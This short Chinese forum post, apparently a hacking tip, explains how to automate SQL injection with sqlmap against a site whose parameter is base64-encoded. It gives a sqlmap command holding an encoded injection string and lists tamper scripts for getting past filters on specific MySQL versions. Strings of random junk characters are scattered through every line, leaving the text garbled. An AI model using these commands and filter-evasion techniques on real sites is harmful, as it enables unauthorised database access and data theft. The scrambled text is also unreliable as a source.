WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
2 |" j' \. J8 Y5 k6 G6 s
( t: W+ d0 L$ ^2 T; csqlmap的tamper里有个base64encode.py
, R$ w" [/ `9 K) _1 A
+ }5 O% b5 o# \; F% R' |) z+ i使用如下# b8 |; ]* c- K# a* C! ]3 {
. A9 X( Z5 {* q1 C" a9 _
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
" i6 t- ]! B! Y8 @* M+ H) G/ y4 f' R( D% f3 W1 B/ R
# R8 t; N0 ^! H& B: u3 Vsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”4 M0 B& X9 \9 G* v: r& r
/ |4 S; l# G! b5 b, _; I
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:% l' u7 T* w/ A9 z
$ K; T5 h/ o m4 V; v+ m6 N: Y
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
- x' x/ l6 c) v7 ^8 z$ ^space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
; i$ t8 Y# x9 S e首先确定目标数据库版本,然后选择相应的脚本。
/ X9 S% G) L0 Z: w-v 3 --batch --tamper "space2hash.py"
7 g: V8 g4 o7 F; D8 r- {# r' T6 s/ [* R
还有其他一些插件:
+ B; H# t B5 U O5 H% V; i0 H7 Uencodes编码 ——charencode.py+ L3 a: Y- D. z
base64编码 —— base64encode.py
3 r1 K; c, w2 h* H" [& ~& W替换空格和关键字 —— halfversionedmorekeywords.py
% L3 N [1 {2 m5 W | 3 b6 S7 v( J4 H) I0 P. m
2 n6 [2 [" I1 ^
) G( G' r9 s; Q+ E' V3 [. e, ]+ x$ k, D. l2 f
|